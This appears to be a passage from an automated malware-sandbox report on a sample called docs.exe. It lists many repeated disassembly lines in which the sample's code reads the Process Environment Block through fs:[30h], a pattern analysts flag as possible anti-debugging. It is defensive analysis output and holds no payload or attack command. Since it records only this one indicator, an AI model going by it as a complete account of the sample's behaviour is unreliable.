          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F44260 mov eax, dword ptr fs:[00000030h]5_2_00F44260
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F44260 mov eax, dword ptr fs:[00000030h]5_2_00F44260
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F44260 mov eax, dword ptr fs:[00000030h]5_2_00F44260
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3826B mov eax, dword ptr fs:[00000030h]5_2_00F3826B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3A250 mov eax, dword ptr fs:[00000030h]5_2_00F3A250
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F46259 mov eax, dword ptr fs:[00000030h]5_2_00F46259
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FFA250 mov eax, dword ptr fs:[00000030h]5_2_00FFA250
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FFA250 mov eax, dword ptr fs:[00000030h]5_2_00FFA250
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC8243 mov eax, dword ptr fs:[00000030h]5_2_00FC8243
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC8243 mov ecx, dword ptr fs:[00000030h]5_2_00FC8243
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3823B mov eax, dword ptr fs:[00000030h]5_2_00F3823B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5E3F0 mov eax, dword ptr fs:[00000030h]5_2_00F5E3F0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5E3F0 mov eax, dword ptr fs:[00000030h]5_2_00F5E3F0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5E3F0 mov eax, dword ptr fs:[00000030h]5_2_00F5E3F0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F763FF mov eax, dword ptr fs:[00000030h]5_2_00F763FF
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F503E9 mov eax, dword ptr fs:[00000030h]5_2_00F503E9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F503E9 mov eax, dword ptr fs:[00000030h]5_2_00F503E9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F503E9 mov eax, dword ptr fs:[00000030h]5_2_00F503E9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F503E9 mov eax, dword ptr fs:[00000030h]5_2_00F503E9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F503E9 mov eax, dword ptr fs:[00000030h]5_2_00F503E9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F503E9 mov eax, dword ptr fs:[00000030h]5_2_00F503E9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F503E9 mov eax, dword ptr fs:[00000030h]5_2_00F503E9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F503E9 mov eax, dword ptr fs:[00000030h]5_2_00F503E9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE3DB mov eax, dword ptr fs:[00000030h]5_2_00FEE3DB
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE3DB mov eax, dword ptr fs:[00000030h]5_2_00FEE3DB
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE3DB mov ecx, dword ptr fs:[00000030h]5_2_00FEE3DB
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE3DB mov eax, dword ptr fs:[00000030h]5_2_00FEE3DB
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE43D4 mov eax, dword ptr fs:[00000030h]5_2_00FE43D4
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE43D4 mov eax, dword ptr fs:[00000030h]5_2_00FE43D4
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FFC3CD mov eax, dword ptr fs:[00000030h]5_2_00FFC3CD
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]5_2_00F4A3C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]5_2_00F4A3C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]5_2_00F4A3C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]5_2_00F4A3C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]5_2_00F4A3C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]5_2_00F4A3C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F483C0 mov eax, dword ptr fs:[00000030h]5_2_00F483C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F483C0 mov eax, dword ptr fs:[00000030h]5_2_00F483C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F483C0 mov eax, dword ptr fs:[00000030h]5_2_00F483C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F483C0 mov eax, dword ptr fs:[00000030h]5_2_00F483C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC63C0 mov eax, dword ptr fs:[00000030h]5_2_00FC63C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0101625D mov eax, dword ptr fs:[00000030h]5_2_0101625D
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F38397 mov eax, dword ptr fs:[00000030h]5_2_00F38397
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F38397 mov eax, dword ptr fs:[00000030h]5_2_00F38397
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F38397 mov eax, dword ptr fs:[00000030h]5_2_00F38397
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6438F mov eax, dword ptr fs:[00000030h]5_2_00F6438F
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6438F mov eax, dword ptr fs:[00000030h]5_2_00F6438F
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3E388 mov eax, dword ptr fs:[00000030h]5_2_00F3E388
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3E388 mov eax, dword ptr fs:[00000030h]5_2_00F3E388
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3E388 mov eax, dword ptr fs:[00000030h]5_2_00F3E388
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE437C mov eax, dword ptr fs:[00000030h]5_2_00FE437C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC035C mov eax, dword ptr fs:[00000030h]5_2_00FC035C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC035C mov eax, dword ptr fs:[00000030h]5_2_00FC035C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC035C mov eax, dword ptr fs:[00000030h]5_2_00FC035C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC035C mov ecx, dword ptr fs:[00000030h]5_2_00FC035C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC035C mov eax, dword ptr fs:[00000030h]5_2_00FC035C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC035C mov eax, dword ptr fs:[00000030h]5_2_00FC035C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE8350 mov ecx, dword ptr fs:[00000030h]5_2_00FE8350
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010162D6 mov eax, dword ptr fs:[00000030h]5_2_010162D6
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3C310 mov ecx, dword ptr fs:[00000030h]5_2_00F3C310
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F60310 mov ecx, dword ptr fs:[00000030h]5_2_00F60310
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7A30B mov eax, dword ptr fs:[00000030h]5_2_00F7A30B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7A30B mov eax, dword ptr fs:[00000030h]5_2_00F7A30B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7A30B mov eax, dword ptr fs:[00000030h]5_2_00F7A30B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01014500 mov eax, dword ptr fs:[00000030h]5_2_01014500
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01014500 mov eax, dword ptr fs:[00000030h]5_2_01014500
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01014500 mov eax, dword ptr fs:[00000030h]5_2_01014500
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01014500 mov eax, dword ptr fs:[00000030h]5_2_01014500
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01014500 mov eax, dword ptr fs:[00000030h]5_2_01014500
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01014500 mov eax, dword ptr fs:[00000030h]5_2_01014500
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01014500 mov eax, dword ptr fs:[00000030h]5_2_01014500
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F404E5 mov ecx, dword ptr fs:[00000030h]5_2_00F404E5
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F744B0 mov ecx, dword ptr fs:[00000030h]5_2_00F744B0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FCA4B0 mov eax, dword ptr fs:[00000030h]5_2_00FCA4B0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F464AB mov eax, dword ptr fs:[00000030h]5_2_00F464AB
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FFA49A mov eax, dword ptr fs:[00000030h]5_2_00FFA49A
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6A470 mov eax, dword ptr fs:[00000030h]5_2_00F6A470
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6A470 mov eax, dword ptr fs:[00000030h]5_2_00F6A470
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6A470 mov eax, dword ptr fs:[00000030h]5_2_00F6A470
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FCC460 mov ecx, dword ptr fs:[00000030h]5_2_00FCC460
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FFA456 mov eax, dword ptr fs:[00000030h]5_2_00FFA456
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6245A mov eax, dword ptr fs:[00000030h]5_2_00F6245A
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3645D mov eax, dword ptr fs:[00000030h]5_2_00F3645D
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E443 mov eax, dword ptr fs:[00000030h]5_2_00F7E443
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E443 mov eax, dword ptr fs:[00000030h]5_2_00F7E443
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E443 mov eax, dword ptr fs:[00000030h]5_2_00F7E443
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E443 mov eax, dword ptr fs:[00000030h]5_2_00F7E443
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E443 mov eax, dword ptr fs:[00000030h]5_2_00F7E443
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E443 mov eax, dword ptr fs:[00000030h]5_2_00F7E443
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E443 mov eax, dword ptr fs:[00000030h]5_2_00F7E443
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E443 mov eax, dword ptr fs:[00000030h]5_2_00F7E443
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7A430 mov eax, dword ptr fs:[00000030h]5_2_00F7A430
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3E420 mov eax, dword ptr fs:[00000030h]5_2_00F3E420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3E420 mov eax, dword ptr fs:[00000030h]5_2_00F3E420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3E420 mov eax, dword ptr fs:[00000030h]5_2_00F3E420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3C427 mov eax, dword ptr fs:[00000030h]5_2_00F3C427
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC6420 mov eax, dword ptr fs:[00000030h]5_2_00FC6420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC6420 mov eax, dword ptr fs:[00000030h]5_2_00FC6420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC6420 mov eax, dword ptr fs:[00000030h]5_2_00FC6420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC6420 mov eax, dword ptr fs:[00000030h]5_2_00FC6420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC6420 mov eax, dword ptr fs:[00000030h]5_2_00FC6420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC6420 mov eax, dword ptr fs:[00000030h]5_2_00FC6420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC6420 mov eax, dword ptr fs:[00000030h]5_2_00FC6420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F78402 mov eax, dword ptr fs:[00000030h]5_2_00F78402
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F78402 mov eax, dword ptr fs:[00000030h]5_2_00F78402
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F78402 mov eax, dword ptr fs:[00000030h]5_2_00F78402
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]5_2_00F6E5E7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]5_2_00F6E5E7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]5_2_00F6E5E7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]5_2_00F6E5E7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]5_2_00F6E5E7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]5_2_00F6E5E7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]5_2_00F6E5E7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]5_2_00F6E5E7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F425E0 mov eax, dword ptr fs:[00000030h]5_2_00F425E0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7C5ED mov eax, dword ptr fs:[00000030h]5_2_00F7C5ED
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7C5ED mov eax, dword ptr fs:[00000030h]5_2_00F7C5ED
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F465D0 mov eax, dword ptr fs:[00000030h]5_2_00F465D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7A5D0 mov eax, dword ptr fs:[00000030h]5_2_00F7A5D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7A5D0 mov eax, dword ptr fs:[00000030h]5_2_00F7A5D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E5CF mov eax, dword ptr fs:[00000030h]5_2_00F7E5CF
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E5CF mov eax, dword ptr fs:[00000030h]5_2_00F7E5CF
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F645B1 mov eax, dword ptr fs:[00000030h]5_2_00F645B1
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F645B1 mov eax, dword ptr fs:[00000030h]5_2_00F645B1
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC05A7 mov eax, dword ptr fs:[00000030h]5_2_00FC05A7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC05A7 mov eax, dword ptr fs:[00000030h]5_2_00FC05A7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC05A7 mov eax, dword ptr fs:[00000030h]5_2_00FC05A7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E59C mov eax, dword ptr fs:[00000030h]5_2_00F7E59C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F42582 mov eax, dword ptr fs:[00000030h]5_2_00F42582
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F42582 mov ecx, dword ptr fs:[00000030h]5_2_00F42582
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F74588 mov eax, dword ptr fs:[00000030h]5_2_00F74588
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7656A mov eax, dword ptr fs:[00000030h]5_2_00F7656A
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7656A mov eax, dword ptr fs:[00000030h]5_2_00F7656A
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7656A mov eax, dword ptr fs:[00000030h]5_2_00F7656A
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F48550 mov eax, dword ptr fs:[00000030h]5_2_00F48550
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F48550 mov eax, dword ptr fs:[00000030h]5_2_00F48550
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50535 mov eax, dword ptr fs:[00000030h]5_2_00F50535
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50535 mov eax, dword ptr fs:[00000030h]5_2_00F50535
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50535 mov eax, dword ptr fs:[00000030h]5_2_00F50535
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50535 mov eax, dword ptr fs:[00000030h]5_2_00F50535
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50535 mov eax, dword ptr fs:[00000030h]5_2_00F50535
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50535 mov eax, dword ptr fs:[00000030h]5_2_00F50535
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E53E mov eax, dword ptr fs:[00000030h]5_2_00F6E53E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E53E mov eax, dword ptr fs:[00000030h]5_2_00F6E53E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E53E mov eax, dword ptr fs:[00000030h]5_2_00F6E53E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E53E mov eax, dword ptr fs:[00000030h]5_2_00F6E53E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E53E mov eax, dword ptr fs:[00000030h]5_2_00F6E53E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD6500 mov eax, dword ptr fs:[00000030h]5_2_00FD6500
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBE6F2 mov eax, dword ptr fs:[00000030h]5_2_00FBE6F2
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBE6F2 mov eax, dword ptr fs:[00000030h]5_2_00FBE6F2
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBE6F2 mov eax, dword ptr fs:[00000030h]5_2_00FBE6F2
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBE6F2 mov eax, dword ptr fs:[00000030h]5_2_00FBE6F2
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC06F1 mov eax, dword ptr fs:[00000030h]5_2_00FC06F1
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC06F1 mov eax, dword ptr fs:[00000030h]5_2_00FC06F1
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7A6C7 mov ebx, dword ptr fs:[00000030h]5_2_00F7A6C7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7A6C7 mov eax, dword ptr fs:[00000030h]5_2_00F7A6C7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F766B0 mov eax, dword ptr fs:[00000030h]5_2_00F766B0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7C6A6 mov eax, dword ptr fs:[00000030h]5_2_00F7C6A6
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F44690 mov eax, dword ptr fs:[00000030h]5_2_00F44690
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F44690 mov eax, dword ptr fs:[00000030h]5_2_00F44690
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F72674 mov eax, dword ptr fs:[00000030h]5_2_00F72674
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7A660 mov eax, dword ptr fs:[00000030h]5_2_00F7A660
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7A660 mov eax, dword ptr fs:[00000030h]5_2_00F7A660
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5C640 mov eax, dword ptr fs:[00000030h]5_2_00F5C640
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5E627 mov eax, dword ptr fs:[00000030h]5_2_00F5E627
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F76620 mov eax, dword ptr fs:[00000030h]5_2_00F76620
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F78620 mov eax, dword ptr fs:[00000030h]5_2_00F78620
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4262C mov eax, dword ptr fs:[00000030h]5_2_00F4262C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82619 mov eax, dword ptr fs:[00000030h]5_2_00F82619
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBE609 mov eax, dword ptr fs:[00000030h]5_2_00FBE609
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5260B mov eax, dword ptr fs:[00000030h]5_2_00F5260B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5260B mov eax, dword ptr fs:[00000030h]5_2_00F5260B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5260B mov eax, dword ptr fs:[00000030h]5_2_00F5260B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5260B mov eax, dword ptr fs:[00000030h]5_2_00F5260B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5260B mov eax, dword ptr fs:[00000030h]5_2_00F5260B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5260B mov eax, dword ptr fs:[00000030h]5_2_00F5260B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5260B mov eax, dword ptr fs:[00000030h]5_2_00F5260B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F447FB mov eax, dword ptr fs:[00000030h]5_2_00F447FB
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F447FB mov eax, dword ptr fs:[00000030h]5_2_00F447FB
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F627ED mov eax, dword ptr fs:[00000030h]5_2_00F627ED
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F627ED mov eax, dword ptr fs:[00000030h]5_2_00F627ED
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F627ED mov eax, dword ptr fs:[00000030h]5_2_00F627ED
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FCE7E1 mov eax, dword ptr fs:[00000030h]5_2_00FCE7E1
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4C7C0 mov eax, dword ptr fs:[00000030h]5_2_00F4C7C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC07C3 mov eax, dword ptr fs:[00000030h]5_2_00FC07C3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F407AF mov eax, dword ptr fs:[00000030h]5_2_00F407AF
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF47A0 mov eax, dword ptr fs:[00000030h]5_2_00FF47A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100866E mov eax, dword ptr fs:[00000030h]5_2_0100866E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100866E mov eax, dword ptr fs:[00000030h]5_2_0100866E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE678E mov eax, dword ptr fs:[00000030h]5_2_00FE678E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F48770 mov eax, dword ptr fs:[00000030h]5_2_00F48770
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50770 mov eax, dword ptr fs:[00000030h]5_2_00F50770
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50770 mov eax, dword ptr fs:[00000030h]5_2_00F50770
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50770 mov eax, dword ptr fs:[00000030h]5_2_00F50770
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50770 mov eax, dword ptr fs:[00000030h]5_2_00F50770
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50770 mov eax, dword ptr fs:[00000030h]5_2_00F50770
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50770 mov eax, dword ptr fs:[00000030h]5_2_00F50770
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50770 mov eax, dword ptr fs:[00000030h]5_2_00F50770
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50770 mov eax, dword ptr fs:[00000030h]5_2_00F50770
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50770 mov eax, dword ptr fs:[00000030h]5_2_00F50770
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50770 mov eax, dword ptr fs:[00000030h]5_2_00F50770
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50770 mov eax, dword ptr fs:[00000030h]5_2_00F50770
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50770 mov eax, dword ptr fs:[00000030h]5_2_00F50770
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FCE75D mov eax, dword ptr fs:[00000030h]5_2_00FCE75D
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F40750 mov eax, dword ptr fs:[00000030h]5_2_00F40750
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82750 mov eax, dword ptr fs:[00000030h]5_2_00F82750
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82750 mov eax, dword ptr fs:[00000030h]5_2_00F82750
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC4755 mov eax, dword ptr fs:[00000030h]5_2_00FC4755
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7674D mov esi, dword ptr fs:[00000030h]5_2_00F7674D
